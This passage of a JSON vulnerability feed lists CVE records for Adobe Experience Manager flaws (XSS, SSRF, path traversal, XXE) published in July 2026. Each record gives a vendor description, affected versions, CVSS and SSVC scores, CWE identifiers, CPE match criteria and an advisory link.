Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"psirt@adobe.com","type":"Secondary","description":[{"lang":"en","value":"CWE-79"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:a:adobe:experience_manager:*:*:*:*:-:*:*:*","versionEndIncluding":"6.5.25.0","matchCriteriaId":"C8849F58-C7F7-4E39-A3F0-6305BAE9D523"},{"vulnerable":true,"criteria":"cpe:2.3:a:adobe:experience_manager:*:*:*:*:aem_cloud_service:*:*:*","versionEndIncluding":"2020.5.0","matchCriteriaId":"A16BC589-7E8B-4FB8-B6D2-3CC5549D7A06"},{"vulnerable":true,"criteria":"cpe:2.3:a:adobe:experience_manager:6.5:-:*:*:lts:*:*:*","matchCriteriaId":"852C2582-859F-40DB-96CF-E1274CEECC1F"},{"vulnerable":true,"criteria":"cpe:2.3:a:adobe:experience_manager:6.5:sp1:*:*:lts:*:*:*","matchCriteriaId":"00DDCBAD-1FEF-487F-97BB-481DC02F493A"},{"vulnerable":true,"criteria":"cpe:2.3:a:adobe:experience_manager:6.5:sp2:*:*:lts:*:*:*","matchCriteriaId":"28842AFC-C6CB-4F63-82B6-7B42E291D4E0"}]}]}],"references":[{"url":"https://helpx.adobe.com/security/products/experience-manager/apsb26-74.html","source":"psirt@adobe.com","tags":["Vendor Advisory"]}]}},{"cve":{"id":"CVE-2026-48257","sourceIdentifier":"psirt@adobe.com","published":"2026-07-14T20:17:06.570","lastModified":"2026-07-17T17:45:12.267","vulnStatus":"Analyzed","cveTags":[],"descriptions":[{"lang":"en","value":"Adobe Experience Manager is affected by a DOM-based Cross-Site Scripting (XSS) vulnerability. An attacker could exploit this issue by manipulating the DOM environment to execute malicious JavaScript within the context of the victim's browser. Exploitation of this issue requires user interaction in that a victim must visit a crafted webpage. Scope is changed."}],"affected":[{"source":"psirt@adobe.com","affectedData":[{"vendor":"Adobe","product":"Adobe Experience Manager as a Cloud Service","defaultStatus":"affected","versions":[{"version":"0","lessThanOrEqual":"2026.5.0","versionType":"custom","status":"affected"},{"version":"2026.6.0","versionType":"custom","status":"unaffected"}]},{"vendor":"Adobe","product":"Adobe Experience Manager 6.5 LTS","defaultStatus":"affected","versions":[{"version":"0","lessThanOrEqual":"SP2","versionType":"custom","status":"affected"},{"version":"SP2 - Hotfix for NPR-43972","versionType":"custom","status":"unaffected"}]},{"vendor":"Adobe","product":"Adobe Experience Manager 6.5","defaultStatus":"affected","versions":[{"version":"0","lessThanOrEqual":"6.5.25","versionType":"custom","status":"affected"},{"version":"6.5.25 - Hotfix for NPR-43971","versionType":"custom","status":"unaffected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"psirt@adobe.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N","baseScore":5.4,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"LOW","userInteraction":"REQUIRED","scope":"CHANGED","confidentialityImpact":"LOW","integrityImpact":"LOW","availabilityImpact":"NONE"},"exploitabilityScore":2.3,"impactScore":2.7}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-16T14:41:29.164794Z","id":"CVE-2026-48257","options":[{"exploitation":"none"},{"automatable":"no"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"psirt@adobe.com","type":"Secondary","description":[{"lang":"en","value":"CWE-79"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:a:adobe:experience_manager:*:*:*:*:-:*:*:*","versionEndIncluding":"6.5.25.0","matchCriteriaId":"C8849F58-C7F7-4E39-A3F0-6305BAE9D523"},{"vulnerable":true,"criteria":"cpe:2.3:a:adobe:experience_manager:*:*:*:*:aem_cloud_service:*:*:*","versionEndIncluding":"2020.5.0","matchCriteriaId":"A16BC589-7E8B-4FB8-B6D2-3CC5549D7A06"},{"vulnerable":true,"criteria":"cpe:2.3:a:adobe:experience_manager:6.5:-:*:*:lts:*:*:*","matchCriteriaId":"852C2582-859F-40DB-96CF-E1274CEECC1F"},{"vulnerable":true,"criteria":"cpe:2.3:a:adobe:experience_manager:6.5:sp1:*:*:lts:*:*:*","matchCriteriaId":"00DDCBAD-1FEF-487F-97BB-481DC02F493A"},{"vulnerable":true,"criteria":"cpe:2.3:a:adobe:experience_manager:6.5:sp2:*:*:lts:*:*:*","matchCriteriaId":"28842AFC-C6CB-4F63-82B6-7B42E291D4E0"}]}]}],"references":[{"url":"https://helpx.adobe.com/security/products/experience-manager/apsb26-74.html","source":"psirt@adobe.com","tags":["Vendor Advisory"]}]}},{"cve":{"id":"CVE-2026-48259","sourceIdentifier":"psirt@adobe.com","published":"2026-07-14T20:17:06.697","lastModified":"2026-07-17T17:45:51.030","vulnStatus":"Analyzed","cveTags":[],"descriptions":[{"lang":"en","value":"Adobe Experience Manager is affected by a Server-Side Request Forgery (SSRF) vulnerability that could result in arbitrary code execution in the context of the current user. A low-privileged attacker could leverage this vulnerability to issue unauthorized server-side requests, potentially gaining elevated access or control over the victim's account or session. Exploitation of this issue does not require user interaction. Scope is changed."}],"affected":[{"source":"psirt@adobe.com","affectedData":[{"vendor":"Adobe","product":"Adobe Experience Manager as a Cloud Service","defaultStatus":"affected","versions":[{"version":"0","lessThanOrEqual":"2026.5.0","versionType":"custom","status":"affected"},{"version":"2026.6.0","versionType":"custom","status":"unaffected"}]},{"vendor":"Adobe","product":"Adobe Experience Manager 6.5 LTS","defaultStatus":"affected","versions":[{"version":"0","lessThanOrEqual":"SP2","versionType":"custom","status":"affected"},{"version":"SP2 - Hotfix for NPR-43972","versionType":"custom","status":"unaffected"}]},{"vendor":"Adobe","product":"Adobe Experience Manager 6.5","defaultStatus":"affected","versions":[{"version":"0","lessThanOrEqual":"6.5.25","versionType":"custom","status":"affected"},{"version":"6.5.25 - Hotfix for NPR-43971","versionType":"custom","status":"unaffected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"psirt@adobe.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N","baseScore":9.6,"baseSeverity":"CRITICAL","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"LOW","userInteraction":"NONE","scope":"CHANGED","confidentialityImpact":"HIGH","integrityImpact":"HIGH","availabilityImpact":"NONE"},"exploitabilityScore":3.1,"impactScore":5.8}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-15T04:00:17.582695Z","id":"CVE-2026-48259","options":[{"exploitation":"none"},{"automatable":"no"},{"technicalImpact":"total"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"psirt@adobe.com","type":"Secondary","description":[{"lang":"en","value":"CWE-918"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:a:adobe:experience_manager:*:*:*:*:-:*:*:*","versionEndIncluding":"6.5.25.0","matchCriteriaId":"C8849F58-C7F7-4E39-A3F0-6305BAE9D523"},{"vulnerable":true,"criteria":"cpe:2.3:a:adobe:experience_manager:*:*:*:*:aem_cloud_service:*:*:*","versionEndIncluding":"2020.5.0","matchCriteriaId":"A16BC589-7E8B-4FB8-B6D2-3CC5549D7A06"},{"vulnerable":true,"criteria":"cpe:2.3:a:adobe:experience_manager:6.5:-:*:*:lts:*:*:*","matchCriteriaId":"852C2582-859F-40DB-96CF-E1274CEECC1F"},{"vulnerable":true,"criteria":"cpe:2.3:a:adobe:experience_manager:6.5:sp1:*:*:lts:*:*:*","matchCriteriaId":"00DDCBAD-1FEF-487F-97BB-481DC02F493A"},{"vulnerable":true,"criteria":"cpe:2.3:a:adobe:experience_manager:6.5:sp2:*:*:lts:*:*:*","matchCriteriaId":"28842AFC-C6CB-4F63-82B6-7B42E291D4E0"}]}]}],"references":[{"url":"https://helpx.adobe.com/security/products/experience-manager/apsb26-74.html","source":"psirt@adobe.com","tags":["Vendor Advisory"]}]}},{"cve":{"id":"CVE-2026-48260","sourceIdentifier":"psirt@adobe.com","published":"2026-07-14T20:17:06.820","lastModified":"2026-07-17T17:45:41.397","vulnStatus":"Analyzed","cveTags":[],"descriptions":[{"lang":"en","value":"Adobe Experience Manager is affected by a DOM-based Cross-Site Scripting (XSS) vulnerability. An attacker could exploit this issue by manipulating the DOM environment to execute malicious JavaScript within the context of the victim's browser. Exploitation of this issue requires user interaction in that a victim must visit a crafted webpage. Scope is changed."}],"affected":[{"source":"psirt@adobe.com","affectedData":[{"vendor":"Adobe","product":"Adobe Experience Manager as a Cloud Service","defaultStatus":"affected","versions":[{"version":"0","lessThanOrEqual":"2026.5.0","versionType":"custom","status":"affected"},{"version":"2026.6.0","versionType":"custom","status":"unaffected"}]},{"vendor":"Adobe","product":"Adobe Experience Manager 6.5 LTS","defaultStatus":"affected","versions":[{"version":"0","lessThanOrEqual":"SP2","versionType":"custom","status":"affected"},{"version":"SP2 - Hotfix for NPR-43972","versionType":"custom","status":"unaffected"}]},{"vendor":"Adobe","product":"Adobe Experience Manager 6.5","defaultStatus":"affected","versions":[{"version":"0","lessThanOrEqual":"6.5.25","versionType":"custom","status":"affected"},{"version":"6.5.25 - Hotfix for NPR-43971","versionType":"custom","status":"unaffected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"psirt@adobe.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N","baseScore":5.4,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"LOW","userInteraction":"REQUIRED","scope":"CHANGED","confidentialityImpact":"LOW","integrityImpact":"LOW","availabilityImpact":"NONE"},"exploitabilityScore":2.3,"impactScore":2.7}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-15T13:21:00.346707Z","id":"CVE-2026-48260","options":[{"exploitation":"none"},{"automatable":"no"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"psirt@adobe.com","type":"Secondary","description":[{"lang":"en","value":"CWE-79"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:a:adobe:experience_manager:*:*:*:*:-:*:*:*","versionEndIncluding":"6.5.25.0","matchCriteriaId":"C8849F58-C7F7-4E39-A3F0-6305BAE9D523"},{"vulnerable":true,"criteria":"cpe:2.3:a:adobe:experience_manager:*:*:*:*:aem_cloud_service:*:*:*","versionEndIncluding":"2020.5.0","matchCriteriaId":"A16BC589-7E8B-4FB8-B6D2-3CC5549D7A06"},{"vulnerable":true,"criteria":"cpe:2.3:a:adobe:experience_manager:6.5:-:*:*:lts:*:*:*","matchCriteriaId":"852C2582-859F-40DB-96CF-E1274CEECC1F"},{"vulnerable":true,"criteria":"cpe:2.3:a:adobe:experience_manager:6.5:sp1:*:*:lts:*:*:*","matchCriteriaId":"00DDCBAD-1FEF-487F-97BB-481DC02F493A"},{"vulnerable":true,"criteria":"cpe:2.3:a:adobe:experience_manager:6.5:sp2:*:*:lts:*:*:*","matchCriteriaId":"28842AFC-C6CB-4F63-82B6-7B42E291D4E0"}]}]}],"references":[{"url":"https://helpx.adobe.com/security/products/experience-manager/apsb26-74.html","source":"psirt@adobe.com","tags":["Vendor Advisory"]}]}},{"cve":{"id":"CVE-2026-48261","sourceIdentifier":"psirt@adobe.com","published":"2026-07-14T20:17:06.950","lastModified":"2026-07-17T17:45:33.150","vulnStatus":"Analyzed","cveTags":[],"descriptions":[{"lang":"en","value":"Adobe Experience Manager is affected by a DOM-based Cross-Site Scripting (XSS) vulnerability. An attacker could exploit this issue by manipulating the DOM environment to execute malicious JavaScript within the context of the victim's browser. Exploitation of this issue requires user interaction in that a victim must visit a crafted webpage. Scope is changed."}],"affected":[{"source":"psirt@adobe.com","affectedData":[{"vendor":"Adobe","product":"Adobe Experience Manager as a Cloud Service","defaultStatus":"affected","versions":[{"version":"0","lessThanOrEqual":"2026.5.0","versionType":"custom","status":"affected"},{"version":"2026.6.0","versionType":"custom","status":"unaffected"}]},{"vendor":"Adobe","product":"Adobe Experience Manager 6.5 LTS","defaultStatus":"affected","versions":[{"version":"0","lessThanOrEqual":"SP2","versionType":"custom","status":"affected"},{"version":"SP2 - Hotfix for NPR-43972","versionType":"custom","status":"unaffected"}]},{"vendor":"Adobe","product":"Adobe Experience Manager 6.5","defaultStatus":"affected","versions":[{"version":"0","lessThanOrEqual":"6.5.25","versionType":"custom","status":"affected"},{"version":"6.5.25 - Hotfix for NPR-43971","versionType":"custom","status":"unaffected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"psirt@adobe.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N","baseScore":5.4,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"LOW","userInteraction":"REQUIRED","scope":"CHANGED","confidentialityImpact":"LOW","integrityImpact":"LOW","availabilityImpact":"NONE"},"exploitabilityScore":2.3,"impactScore":2.7}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-15T13:53:40.627102Z","id":"CVE-2026-48261","options":[{"exploitation":"none"},{"automatable":"no"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"psirt@adobe.com","type":"Secondary","description":[{"lang":"en","value":"CWE-79"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:a:adobe:experience_manager:*:*:*:*:-:*:*:*","versionEndIncluding":"6.5.25.0","matchCriteriaId":"C8849F58-C7F7-4E39-A3F0-6305BAE9D523"},{"vulnerable":true,"criteria":"cpe:2.3:a:adobe:experience_manager:*:*:*:*:aem_cloud_service:*:*:*","versionEndIncluding":"2020.5.0","matchCriteriaId":"A16BC589-7E8B-4FB8-B6D2-3CC5549D7A06"},{"vulnerable":true,"criteria":"cpe:2.3:a:adobe:experience_manager:6.5:-:*:*:lts:*:*:*","matchCriteriaId":"852C2582-859F-40DB-96CF-E1274CEECC1F"},{"vulnerable":true,"criteria":"cpe:2.3:a:adobe:experience_manager:6.5:sp1:*:*:lts:*:*:*","matchCriteriaId":"00DDCBAD-1FEF-487F-97BB-481DC02F493A"},{"vulnerable":true,"criteria":"cpe:2.3:a:adobe:experience_manager:6.5:sp2:*:*:lts:*:*:*","matchCriteriaId":"28842AFC-C6CB-4F63-82B6-7B42E291D4E0"}]}]}],"references":[{"url":"https://helpx.adobe.com/security/products/experience-manager/apsb26-74.html","source":"psirt@adobe.com","tags":["Vendor Advisory"]}]}},{"cve":{"id":"CVE-2026-48262","sourceIdentifier":"psirt@adobe.com","published":"2026-07-14T20:17:07.073","lastModified":"2026-07-17T17:45:30.643","vulnStatus":"Analyzed","cveTags":[],"descriptions":[{"lang":"en","value":"Adobe Experience Manager is affected by a DOM-based Cross-Site Scripting (XSS) vulnerability. An attacker could exploit this issue by manipulating the DOM environment to execute malicious JavaScript within the context of the victim's browser. Exploitation of this issue requires user interaction in that a victim must visit a crafted webpage. Scope is changed."}],"affected":[{"source":"psirt@adobe.com","affectedData":[{"vendor":"Adobe","product":"Adobe Experience Manager as a Cloud Service","defaultStatus":"affected","versions":[{"version":"0","lessThanOrEqual":"2026.5.0","versionType":"custom","status":"affected"},{"version":"2026.6.0","versionType":"custom","status":"unaffected"}]},{"vendor":"Adobe","product":"Adobe Experience Manager 6.5 LTS","defaultStatus":"affected","versions":[{"version":"0","lessThanOrEqual":"SP2","versionType":"custom","status":"affected"},{"version":"SP2 - Hotfix for NPR-43972","versionType":"custom","status":"unaffected"}]},{"vendor":"Adobe","product":"Adobe Experience Manager 6.5","defaultStatus":"affected","versions":[{"version":"0","lessThanOrEqual":"6.5.25","versionType":"custom","status":"affected"},{"version":"6.5.25 - Hotfix for NPR-43971","versionType":"custom","status":"unaffected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"psirt@adobe.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N","baseScore":5.4,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"LOW","userInteraction":"REQUIRED","scope":"CHANGED","confidentialityImpact":"LOW","integrityImpact":"LOW","availabilityImpact":"NONE"},"exploitabilityScore":2.3,"impactScore":2.7}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-15T14:06:44.676085Z","id":"CVE-2026-48262","options":[{"exploitation":"none"},{"automatable":"no"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"psirt@adobe.com","type":"Secondary","description":[{"lang":"en","value":"CWE-79"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:a:adobe:experience_manager:*:*:*:*:-:*:*:*","versionEndIncluding":"6.5.25.0","matchCriteriaId":"C8849F58-C7F7-4E39-A3F0-6305BAE9D523"},{"vulnerable":true,"criteria":"cpe:2.3:a:adobe:experience_manager:*:*:*:*:aem_cloud_service:*:*:*","versionEndIncluding":"2020.5.0","matchCriteriaId":"A16BC589-7E8B-4FB8-B6D2-3CC5549D7A06"},{"vulnerable":true,"criteria":"cpe:2.3:a:adobe:experience_manager:6.5:-:*:*:lts:*:*:*","matchCriteriaId":"852C2582-859F-40DB-96CF-E1274CEECC1F"},{"vulnerable":true,"criteria":"cpe:2.3:a:adobe:experience_manager:6.5:sp1:*:*:lts:*:*:*","matchCriteriaId":"00DDCBAD-1FEF-487F-97BB-481DC02F493A"},{"vulnerable":true,"criteria":"cpe:2.3:a:adobe:experience_manager:6.5:sp2:*:*:lts:*:*:*","matchCriteriaId":"28842AFC-C6CB-4F63-82B6-7B42E291D4E0"}]}]}],"references":[{"url":"https://helpx.adobe.com/security/products/experience-manager/apsb26-74.html","source":"psirt@adobe.com","tags":["Vendor Advisory"]}]}},{"cve":{"id":"CVE-2026-48263","sourceIdentifier":"psirt@adobe.com","published":"2026-07-14T20:17:07.213","lastModified":"2026-07-17T17:45:27.680","vulnStatus":"Analyzed","cveTags":[],"descriptions":[{"lang":"en","value":"Adobe Experience Manager is affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. Scope is changed."}],"affected":[{"source":"psirt@adobe.com","affectedData":[{"vendor":"Adobe","product":"Adobe Experience Manager as a Cloud Service","defaultStatus":"affected","versions":[{"version":"0","lessThanOrEqual":"2026.5.0","versionType":"custom","status":"affected"},{"version":"2026.6.0","versionType":"custom","status":"unaffected"}]},{"vendor":"Adobe","product":"Adobe Experience Manager 6.5 LTS","defaultStatus":"affected","versions":[{"version":"0","lessThanOrEqual":"SP2","versionType":"custom","status":"affected"},{"version":"SP2 - Hotfix for NPR-43972","versionType":"custom","status":"unaffected"}]},{"vendor":"Adobe","product":"Adobe Experience Manager 6.5","defaultStatus":"affected","versions":[{"version":"0","lessThanOrEqual":"6.5.25","versionType":"custom","status":"affected"},{"version":"6.5.25 - Hotfix for NPR-43971","versionType":"custom","status":"unaffected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"psirt@adobe.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N","baseScore":5.4,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"LOW","userInteraction":"REQUIRED","scope":"CHANGED","confidentialityImpact":"LOW","integrityImpact":"LOW","availabilityImpact":"NONE"},"exploitabilityScore":2.3,"impactScore":2.7}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-15T17:37:41.203594Z","id":"CVE-2026-48263","options":[{"exploitation":"none"},{"automatable":"no"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"psirt@adobe.com","type":"Secondary","description":[{"lang":"en","value":"CWE-79"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:a:adobe:experience_manager:*:*:*:*:-:*:*:*","versionEndIncluding":"6.5.25.0","matchCriteriaId":"C8849F58-C7F7-4E39-A3F0-6305BAE9D523"},{"vulnerable":true,"criteria":"cpe:2.3:a:adobe:experience_manager:*:*:*:*:aem_cloud_service:*:*:*","versionEndIncluding":"2020.5.0","matchCriteriaId":"A16BC589-7E8B-4FB8-B6D2-3CC5549D7A06"},{"vulnerable":true,"criteria":"cpe:2.3:a:adobe:experience_manager:6.5:-:*:*:lts:*:*:*","matchCriteriaId":"852C2582-859F-40DB-96CF-E1274CEECC1F"},{"vulnerable":true,"criteria":"cpe:2.3:a:adobe:experience_manager:6.5:sp1:*:*:lts:*:*:*","matchCriteriaId":"00DDCBAD-1FEF-487F-97BB-481DC02F493A"},{"vulnerable":true,"criteria":"cpe:2.3:a:adobe:experience_manager:6.5:sp2:*:*:lts:*:*:*","matchCriteriaId":"28842AFC-C6CB-4F63-82B6-7B42E291D4E0"}]}]}],"references":[{"url":"https://helpx.adobe.com/security/products/experience-manager/apsb26-74.html","source":"psirt@adobe.com","tags":["Vendor Advisory"]}]}},{"cve":{"id":"CVE-2026-48310","sourceIdentifier":"psirt@adobe.com","published":"2026-07-14T20:17:07.450","lastModified":"2026-07-17T17:45:04.330","vulnStatus":"Analyzed","cveTags":[],"descriptions":[{"lang":"en","value":"Adobe Experience Manager is affected by an Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability that could lead to arbitrary file system read. An attacker could exploit this vulnerability to access sensitive files and directories outside the intended access scope. Exploitation of this issue does not require user interaction. Scope is changed."}],"affected":[{"source":"psirt@adobe.com","affectedData":[{"vendor":"Adobe","product":"Adobe Experience Manager as a Cloud Service","defaultStatus":"affected","versions":[{"version":"0","lessThanOrEqual":"2026.5.0","versionType":"custom","status":"affected"},{"version":"2026.6.0","versionType":"custom","status":"unaffected"}]},{"vendor":"Adobe","product":"Adobe Experience Manager 6.5 LTS","defaultStatus":"affected","versions":[{"version":"0","lessThanOrEqual":"SP2","versionType":"custom","status":"affected"},{"version":"SP2 - Hotfix for NPR-43972","versionType":"custom","status":"unaffected"}]},{"vendor":"Adobe","product":"Adobe Experience Manager 6.5","defaultStatus":"affected","versions":[{"version":"0","lessThanOrEqual":"6.5.25","versionType":"custom","status":"affected"},{"version":"6.5.25 - Hotfix for NPR-43971","versionType":"custom","status":"unaffected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"psirt@adobe.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N","baseScore":8.6,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"CHANGED","confidentialityImpact":"HIGH","integrityImpact":"NONE","availabilityImpact":"NONE"},"exploitabilityScore":3.9,"impactScore":4.0}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-16T14:44:01.146988Z","id":"CVE-2026-48310","options":[{"exploitation":"none"},{"automatable":"yes"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"psirt@adobe.com","type":"Secondary","description":[{"lang":"en","value":"CWE-22"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:a:adobe:experience_manager:*:*:*:*:-:*:*:*","versionEndIncluding":"6.5.25.0","matchCriteriaId":"C8849F58-C7F7-4E39-A3F0-6305BAE9D523"},{"vulnerable":true,"criteria":"cpe:2.3:a:adobe:experience_manager:*:*:*:*:aem_cloud_service:*:*:*","versionEndIncluding":"2020.5.0","matchCriteriaId":"A16BC589-7E8B-4FB8-B6D2-3CC5549D7A06"},{"vulnerable":true,"criteria":"cpe:2.3:a:adobe:experience_manager:6.5:-:*:*:lts:*:*:*","matchCriteriaId":"852C2582-859F-40DB-96CF-E1274CEECC1F"},{"vulnerable":true,"criteria":"cpe:2.3:a:adobe:experience_manager:6.5:sp1:*:*:lts:*:*:*","matchCriteriaId":"00DDCBAD-1FEF-487F-97BB-481DC02F493A"},{"vulnerable":true,"criteria":"cpe:2.3:a:adobe:experience_manager:6.5:sp2:*:*:lts:*:*:*","matchCriteriaId":"28842AFC-C6CB-4F63-82B6-7B42E291D4E0"}]}]}],"references":[{"url":"https://helpx.adobe.com/security/products/experience-manager/apsb26-74.html","source":"psirt@adobe.com","tags":["Vendor Advisory"]}]}},{"cve":{"id":"CVE-2026-48355","sourceIdentifier":"psirt@adobe.com","published":"2026-07-14T20:17:08.300","lastModified":"2026-07-17T17:45:23.320","vulnStatus":"Analyzed","cveTags":[],"descriptions":[{"lang":"en","value":"Adobe Experience Manager is affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. Scope is changed."}],"affected":[{"source":"psirt@adobe.com","affectedData":[{"vendor":"Adobe","product":"Adobe Experience Manager as a Cloud Service","defaultStatus":"affected","versions":[{"version":"0","lessThanOrEqual":"2026.5.0","versionType":"custom","status":"affected"},{"version":"2026.6.0","versionType":"custom","status":"unaffected"}]},{"vendor":"Adobe","product":"Adobe Experience Manager 6.5 LTS","defaultStatus":"affected","versions":[{"version":"0","lessThanOrEqual":"SP2","versionType":"custom","status":"affected"},{"version":"SP2 - Hotfix for NPR-43972","versionType":"custom","status":"unaffected"}]},{"vendor":"Adobe","product":"Adobe Experience Manager 6.5","defaultStatus":"affected","versions":[{"version":"0","lessThanOrEqual":"6.5.25","versionType":"custom","status":"affected"},{"version":"6.5.25 - Hotfix for NPR-43971","versionType":"custom","status":"unaffected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"psirt@adobe.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N","baseScore":5.4,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"LOW","userInteraction":"REQUIRED","scope":"CHANGED","confidentialityImpact":"LOW","integrityImpact":"LOW","availabilityImpact":"NONE"},"exploitabilityScore":2.3,"impactScore":2.7}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-15T14:35:14.413173Z","id":"CVE-2026-48355","options":[{"exploitation":"none"},{"automatable":"no"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"psirt@adobe.com","type":"Secondary","description":[{"lang":"en","value":"CWE-79"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:a:adobe:experience_manager:*:*:*:*:-:*:*:*","versionEndIncluding":"6.5.25.0","matchCriteriaId":"C8849F58-C7F7-4E39-A3F0-6305BAE9D523"},{"vulnerable":true,"criteria":"cpe:2.3:a:adobe:experience_manager:*:*:*:*:aem_cloud_service:*:*:*","versionEndIncluding":"2020.5.0","matchCriteriaId":"A16BC589-7E8B-4FB8-B6D2-3CC5549D7A06"},{"vulnerable":true,"criteria":"cpe:2.3:a:adobe:experience_manager:6.5:-:*:*:lts:*:*:*","matchCriteriaId":"852C2582-859F-40DB-96CF-E1274CEECC1F"},{"vulnerable":true,"criteria":"cpe:2.3:a:adobe:experience_manager:6.5:sp1:*:*:lts:*:*:*","matchCriteriaId":"00DDCBAD-1FEF-487F-97BB-481DC02F493A"},{"vulnerable":true,"criteria":"cpe:2.3:a:adobe:experience_manager:6.5:sp2:*:*:lts:*:*:*","matchCriteriaId":"28842AFC-C6CB-4F63-82B6-7B42E291D4E0"}]}]}],"references":[{"url":"https://helpx.adobe.com/security/products/experience-manager/apsb26-74.html","source":"psirt@adobe.com","tags":["Vendor Advisory"]}]}},{"cve":{"id":"CVE-2026-48359","sourceIdentifier":"psirt@adobe.com","published":"2026-07-14T20:17:08.810","lastModified":"2026-07-17T17:45:16.077","vulnStatus":"Analyzed","cveTags":[],"descriptions":[{"lang":"en","value":"Adobe Experience Manager is affected by an Improper Restriction of XML External Entity Reference ('XXE') vulnerability that could result in arbitrary code execution in the context of the current user. A low-privileged attacker could exploit this vulnerability to read sensitive files, potentially gaining elevated access or control over the victim's account or session. Exploitation of this issue does not require user interaction. Scope is changed."}],"affected":[{"source":"psirt@adobe.com","affectedData":[{"vendor":"Adobe","product":"Adobe Experience Manager as a Cloud Service","defaultStatus":"affected","versions":[{"version":"0","lessThanOrEqual":"2026.5.0","versionType":"custom","status":"affected"},{"version":"2026.6.0","versionType":"custom","status":"unaffected"}]},{"vendor":"Adobe","product":"Adobe Experience Manager 6.5 